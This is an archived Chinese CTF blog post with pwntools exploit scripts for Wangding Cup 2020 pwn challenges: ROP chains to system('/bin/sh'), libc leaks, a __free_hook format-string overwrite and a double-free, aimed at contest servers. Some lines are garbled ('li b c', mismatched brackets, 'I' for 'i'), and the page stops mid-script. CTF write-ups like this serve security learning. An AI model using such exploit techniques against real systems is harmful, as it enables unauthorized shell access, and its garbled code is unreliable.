<!DOCTYPE html>
<html>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="referrer" content="no-referrer" />
    <meta name="description" content="四场题目都着实有点……无以言表记录一下部分脚本，防止以后可能会用到，再次造轮子(太难太简单木写，以后应该用不上，也不想放出来) 0x01 青龙组boom1题目是一个编译器，编译后会模拟执行，vm和程序本身同一个进程，只能调用open read write printf(没有system)….函数，且通过设置全局flag只能调用一次函数，调试可以看到在用于模拟执行的malloc的块中含有栈地址，可以">
<meta property="og:type" content="article">
<meta property="og:title" content="网鼎杯  1-4 脚本小记">
<meta property="og:url" content="http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/index.html">
<meta property="og:site_name" content="Kirin&#39;s Blog">
<meta property="og:description" content="四场题目都着实有点……无以言表记录一下部分脚本，防止以后可能会用到，再次造轮子(太难太简单木写，以后应该用不上，也不想放出来) 0x01 青龙组boom1题目是一个编译器，编译后会模拟执行，vm和程序本身同一个进程，只能调用open read write printf(没有system)….函数，且通过设置全局flag只能调用一次函数，调试可以看到在用于模拟执行的malloc的块中含有栈地址，可以">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/7434375-7a38065bfeac3101.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/7434375-1d0c26caab545b06.png!thumbnail?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="article:published_time" content="2020-05-25T15:28:49.000Z">
<meta property="article:modified_time" content="2020-06-03T15:39:02.875Z">
<meta property="article:author" content="Kirin">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/7434375-7a38065bfeac3101.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>网鼎杯  1-4 脚本小记</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/06/01/RCTF-2020-mginx-no-write/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/03/10/Kernoob-kmalloc-without-SMAP/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&text=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&title=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&is_video=false&description=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=网鼎杯  1-4 脚本小记&body=Check out this article: http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&title=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&title=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&title=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&title=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&name=网鼎杯  1-4 脚本小记&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-青龙组"><span class="toc-number">1.</span> <span class="toc-text">0x01 青龙组</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#boom1"><span class="toc-number">1.1.</span> <span class="toc-text">boom1</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#boom2"><span class="toc-number">1.2.</span> <span class="toc-text">boom2</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#faster0"><span class="toc-number">1.3.</span> <span class="toc-text">faster0</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02-白虎"><span class="toc-number">2.</span> <span class="toc-text">0x02 白虎</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x03-朱雀"><span class="toc-number">3.</span> <span class="toc-text">0x03 朱雀</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#云盾"><span class="toc-number">3.1.</span> <span class="toc-text">云盾</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#魔法房间"><span class="toc-number">3.2.</span> <span class="toc-text">魔法房间</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x04-玄武"><span class="toc-number">4.</span> <span class="toc-text">0x04 玄武</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#faster-1"><span class="toc-number">4.1.</span> <span class="toc-text">faster 1</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#faster-2"><span class="toc-number">4.2.</span> <span class="toc-text">faster 2</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        网鼎杯  1-4 脚本小记
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Kirin's Blog</span>
      </span>
      
    <div class="postdate">
        <time datetime="2020-05-25T15:28:49.000Z" itemprop="datePublished">2020-05-25</time>
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>四场题目都着实有点……无以言表<br>记录一下部分脚本，防止以后可能会用到，再次造轮子(太难太简单木写，以后应该用不上，也不想放出来)</p>
<h3 id="0x01-青龙组"><a href="#0x01-青龙组" class="headerlink" title="0x01 青龙组"></a>0x01 青龙组</h3><h4 id="boom1"><a href="#boom1" class="headerlink" title="boom1"></a>boom1</h4><p>题目是一个编译器，编译后会模拟执行，vm和程序本身同一个进程，只能调用open read write printf(没有system)….函数，且通过设置全局flag只能调用一次函数，调试可以看到在用于模拟执行的malloc的块中含有栈地址，可以直接通过：int *fd;int *i;int *j; j=&i;j=*(j+4);来获得程序本身的栈地址，然后leak出程序加载基址，修改全局flag位就可以多次调用函数，而后利用写语句来在栈上布置一条rop链，执行system(/bin/sh)即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">"debug"</span></span><br><span class="line">p=remote(<span class="string">"182.92.73.10"</span>,<span class="number">24573</span>)</span><br><span class="line"><span class="comment">#p=process("./pwn")</span></span><br><span class="line">payload=<span class="string">'void main()&#123;int *fd;int *i;int *j; j=&amp;i;j=*(j+4);i=j-30;j=*i;j=j+262716;i=i+1;fd=*i;printf("%p %p",fd,i);*j=1;read(0,i,0x100);&#125;'</span></span><br><span class="line">p.sendlineafter(<span class="string">"...\n"</span>,payload)</span><br><span class="line">s=p.recvuntil(<span class="string">" "</span>)</span><br><span class="line">s2=p.recv(<span class="number">14</span>)</span><br><span class="line">libc=int(s,<span class="number">16</span>)<span class="number">-0x20830</span><span class="comment">#0x7f35f8df8b97+0x7f35f8dd7000</span></span><br><span class="line">stack=int(s2,<span class="number">16</span>)</span><br><span class="line"><span class="keyword">print</span> hex(libc),hex(stack)</span><br><span class="line">pop_rdi=libc+<span class="number">0x21102</span><span class="comment">#0x02155f</span></span><br><span class="line">system=libc+<span class="number">0x45390</span><span class="comment">#0x4f440</span></span><br><span class="line">rop=p64(pop_rdi)+p64(stack+<span class="number">0x28</span>)+p64(pop_rdi+<span class="number">1</span>)+p64(system)+p64(<span class="number">0</span>)+<span class="string">"/bin/sh\x00"</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.sendline(rop)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h4 id="boom2"><a href="#boom2" class="headerlink" title="boom2"></a>boom2</h4><p>和boom1类似，用于模拟执行开辟的空间中同样存在栈地址，利用程序本身的opcode获得main函数返回地址：libc_start_main附近地址，而后再将其覆盖为one_target即可，过程见exp注释：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#context.log_level="debug"</span></span><br><span class="line"><span class="comment">#p=process("pwn-2")</span></span><br><span class="line">p=remote(<span class="string">"182.92.73.10"</span>,<span class="number">36642</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">payload=p64(<span class="number">0x1</span>)+p64(<span class="number">0xffffffffffffff18</span>)</span><br><span class="line">payload+=p64(<span class="number">0xd</span>)</span><br><span class="line">payload+=p64(<span class="number">0</span>)+p64(<span class="number">0xfffffffffffffffc</span>)</span><br><span class="line">payload+=p64(<span class="number">9</span>)</span><br><span class="line">payload+=p64(<span class="number">0x19</span>)</span><br><span class="line">payload+=p64(<span class="number">0xd</span>)<span class="comment">#push stack addr</span></span><br><span class="line">payload+=p64(<span class="number">0x9</span>)<span class="comment">#get libc addr</span></span><br><span class="line">payload+=p64(<span class="number">0xd</span>)<span class="comment">#push libc_start_main</span></span><br><span class="line">payload+=p64(<span class="number">0x1</span>)+p64(<span class="number">854295</span>)<span class="comment">#write one_target</span></span><br><span class="line">payload+=p64(<span class="number">0x19</span>)</span><br><span class="line">payload+=p64(<span class="number">11</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"code&gt; "</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h4 id="faster0"><a href="#faster0" class="headerlink" title="faster0"></a>faster0</h4><p>get ans部分：直接解析指令，对应着1-100，挨着调用就行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">e=ELF(<span class="string">"./pwn3"</span>)</span><br><span class="line">ans=[]</span><br><span class="line"><span class="keyword">for</span> id_f <span class="keyword">in</span> range(<span class="number">100</span>):</span><br><span class="line">	func_id=id_f</span><br><span class="line">	func_name=<span class="string">"func"</span>+str(func_id).rjust(<span class="number">3</span>,<span class="string">"0"</span>)</span><br><span class="line">	call_func_name=[]</span><br><span class="line">	call_func=[]</span><br><span class="line">	call_addr=[]</span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">10</span>):</span><br><span class="line">		<span class="keyword">if</span>  id_f ==<span class="number">0</span>:</span><br><span class="line">		    call_addr.append(e.functions[func_name].address+<span class="number">0x5c</span>+I*<span class="number">0xc</span>)</span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			call_addr.append(e.functions[func_name].address+<span class="number">0x5d</span>+I*<span class="number">0xc</span>)</span><br><span class="line">	<span class="keyword">for</span> j <span class="keyword">in</span> call_addr:</span><br><span class="line">	    tmp=u32(e.data[j<span class="number">-0x400000</span>+<span class="number">1</span>:j<span class="number">-0x400000</span>+<span class="number">4</span>+<span class="number">1</span>])</span><br><span class="line">	    tmp_addr=j+<span class="number">5</span></span><br><span class="line">	    <span class="keyword">if</span> tmp&gt;<span class="number">0x80000000</span>:</span><br><span class="line">	        tmp=tmp<span class="number">-0x100000000</span></span><br><span class="line">	    next_func=j+<span class="number">5</span>+tmp</span><br><span class="line">	    call_func.append(next_func)</span><br><span class="line">	next_func_id=func_id+<span class="number">1</span></span><br><span class="line">	next_func_name=<span class="string">"func"</span>+str(next_func_id).rjust(<span class="number">3</span>,<span class="string">"0"</span>)</span><br><span class="line">	ans.append(call_func.index(e.functions[next_func_name].address))</span><br><span class="line"><span class="keyword">print</span> ans</span><br></pre></td></tr></table></figure>
<p>get shell部分(faster 0 1 2 getshell部分基本一样，改一下pop gadget地址即可，忘记这是具体哪一题的了)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">"123.56.171.55"</span>,<span class="number">27940</span>)</span><br><span class="line">context.log_level=<span class="string">"debug"</span></span><br><span class="line">p.sendlineafter(<span class="string">":"</span>,<span class="string">""</span>)<span class="comment">#token</span></span><br><span class="line">ans=<span class="string">""</span>  <span class="comment">#填入s</span></span><br><span class="line">p.sendline(ans)</span><br><span class="line">li b c=ELF(<span class="string">"./libc-2.30.so"</span>)</span><br><span class="line">elf = ELF(<span class="string">"./faster0"</span>)</span><br><span class="line">pop_rdi = <span class="number">0x432e83</span></span><br><span class="line">pop_rsi_2 = <span class="number">0x432e81</span></span><br><span class="line">magic=<span class="number">0x432d54</span></span><br><span class="line">payload = <span class="string">'b'</span>*<span class="number">0xd8</span></span><br><span class="line">payload+=p64(pop_rdi)+p64(<span class="number">1</span>)+p64(pop_rsi_2)</span><br><span class="line">payload+=p64(elf.got[<span class="string">'read'</span>])+p64(<span class="number">0</span>)+p64(elf.plt[<span class="string">'write'</span>])</span><br><span class="line">payload+=p64(magic)</span><br><span class="line">p.sendlineafter(<span class="string">" !\n"</span>, payload)</span><br><span class="line">read_addr = u64(p.recv(<span class="number">6</span>)+<span class="string">'\x00'</span>*<span class="number">2</span>)</span><br><span class="line">libc.address = read_addr-libc.sym[<span class="string">'read'</span>)</span><br><span class="line">system = libc.sym[<span class="string">'system'</span>]</span><br><span class="line">b_insh = libc.search(<span class="string">"/bin/sh"</span>).next()</span><br><span class="line">payload = <span class="string">'a'</span>*(<span class="number">0xd0</span>+<span class="number">8</span>)+p64(pop_rdi)+p64(b_insh)+p64(system)</span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">p.sendline()</span><br><span class="line">p.sendlineafter(<span class="string">" !\n"</span>, payload)</span><br><span class="line">p.interactive(</span><br></pre></td></tr></table></figure>
<h3 id="0x02-白虎"><a href="#0x02-白虎" class="headerlink" title="0x02 白虎"></a>0x02 白虎</h3><p>懒得记</p>
<h3 id="0x03-朱雀"><a href="#0x03-朱雀" class="headerlink" title="0x03 朱雀"></a>0x03 朱雀</h3><h4 id="云盾"><a href="#云盾" class="headerlink" title="云盾"></a>云盾</h4><p>格式化字符串</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">"debug"</span></span><br><span class="line">p=process(<span class="string">"./pwn-4"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"&gt; "</span>,<span class="string">"vim 2"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"&gt; "</span>,<span class="string">"%35$p"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"&gt; &gt; "</span>,<span class="string">"cat 2"</span>)</span><br><span class="line">libc_start_main=int(p.recvuntil(<span class="string">"\n"</span>)[:<span class="number">-1</span>],<span class="number">16</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">libc_base=libc_start_main<span class="number">-0x7ffb36b34b97</span>+<span class="number">0x7ffb36b13000</span></span><br><span class="line">free_hook_addr=libc_base+<span class="number">0x003ed8e8</span></span><br><span class="line">system_addr=libc_base+<span class="number">0x04f440</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">6</span>):</span><br><span class="line">     p.sendlineafter(<span class="string">"&gt; "</span>,<span class="string">"b"</span>*<span class="number">0x18</span>+p64(free_hook_addr+i))</span><br><span class="line">     p.sendlineafter(<span class="string">"&gt; "</span>,<span class="string">"vim 2"</span>)</span><br><span class="line">     p.sendlineafter(<span class="string">"&gt; "</span>,<span class="string">"%"</span>+str(system_addr&amp;<span class="number">0xff</span>)+<span class="string">"c%13$hhn"</span>)</span><br><span class="line">     p.sendlineafter(<span class="string">"&gt; &gt; "</span>,<span class="string">"cat 2"</span>)</span><br><span class="line">     system_addr=system_addr&gt;&gt;<span class="number">8</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.sendlineafter(<span class="string">"&gt; "</span>,<span class="string">"vim 1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"&gt; "</span>,<span class="string">"/bin/sh"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"&gt; &gt; "</span>,<span class="string">"rm 1"</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h4 id="魔法房间"><a href="#魔法房间" class="headerlink" title="魔法房间"></a>魔法房间</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(size,name)</span>:</span></span><br><span class="line">   p.sendlineafter(<span class="string">":"</span>,<span class="string">"1"</span>)</span><br><span class="line">   p.sendlineafter(<span class="string">":"</span>,str(size))</span><br><span class="line">   p.sendafter(<span class="string">":"</span>,name)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(index)</span>:</span></span><br><span class="line">   p.sendlineafter(<span class="string">":"</span>,<span class="string">"2"</span>)</span><br><span class="line">   p.sendlineafter(<span class="string">":"</span>,str(index))</span><br><span class="line"></span><br><span class="line"><span class="comment">#context.log_level="debug"</span></span><br><span class="line">p=remote(<span class="string">"59.110.243.101"</span>,<span class="number">54621</span>)</span><br><span class="line">add(<span class="number">0x50</span>,<span class="string">"1111111"</span>)</span><br><span class="line">add(<span class="number">0x50</span>,<span class="string">"2222222"</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x20</span>,<span class="string">"11111111"</span>)</span><br><span class="line">add(<span class="number">0x10</span>,<span class="string">"11111111"</span>+p64(<span class="number">0x400A1B</span>))</span><br><span class="line">p.sendlineafter(<span class="string">":"</span>,<span class="string">"3"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">":"</span>,<span class="string">"2"</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.interactive(</span><br></pre></td></tr></table></figure>
<h3 id="0x04-玄武"><a href="#0x04-玄武" class="headerlink" title="0x04 玄武"></a>0x04 玄武</h3><h4 id="faster-1"><a href="#faster-1" class="headerlink" title="faster 1"></a>faster 1</h4><p><img src="https://upload-images.jianshu.io/upload_images/7434375-7a38065bfeac3101.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>需要连续1000次调用特定函数才能到达overflow函数<br>overflow函数存在栈溢出<br>按照指令匹配ELF，根据cmp的数字来确定函数的调用顺序：<br>而后直接根据调用顺序得到payload到溢出函数<br>溢出后使用write来leak read函数地址，通过低位find到是2.30，然后再次溢出到system<br>首先获得1000字符的输入：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#base64 -d</span></span><br><span class="line"><span class="comment">#tar -xvf</span></span><br><span class="line"><span class="comment">#upx -d</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">"./faster1"</span>)</span><br><span class="line">raw = elf.read(<span class="number">0x400000</span>,<span class="number">0x36f00</span>)</span><br><span class="line">start1= <span class="string">"\x55\x48\x89\xe5\x8b\x05"</span></span><br><span class="line">start2= <span class="string">"\x55\x48\x89\xe5\x48\x81"</span></span><br><span class="line">function_list = []</span><br><span class="line">offset = raw.find(start1)</span><br><span class="line"><span class="keyword">while</span> offset != <span class="number">-1</span>:</span><br><span class="line">    function_list.append(offset+<span class="number">0x400000</span>)</span><br><span class="line">    offset = raw.find(start1,offset+<span class="number">1</span>)</span><br><span class="line">magic = raw.find(start2,offset+<span class="number">1</span>)+<span class="number">0x400000</span></span><br><span class="line">next_calls=[]</span><br><span class="line">function=&#123;&#125;</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> function_list:</span><br><span class="line">    func_id_address=I+<span class="number">0x13</span></span><br><span class="line">    function_id=<span class="number">0</span></span><br><span class="line">    num=<span class="number">0</span></span><br><span class="line">    <span class="keyword">if</span> elf.data[func_id_address<span class="number">-0x400000</span>:func_id_address<span class="number">-0x400000</span>+<span class="number">2</span>]==<span class="string">"\x85\xc0"</span>:</span><br><span class="line">         function_id=<span class="number">0</span></span><br><span class="line">         num=<span class="number">0x5c</span></span><br><span class="line">    <span class="keyword">elif</span> elf.data[func_id_address<span class="number">-0x400000</span>]==<span class="string">"\x3d"</span>:</span><br><span class="line">         function_id=u32(elf.data[func_id_address<span class="number">-0x400000</span>+<span class="number">1</span>:func_id_address<span class="number">-0x400000</span>+<span class="number">4</span>+<span class="number">1</span>])</span><br><span class="line">         num=<span 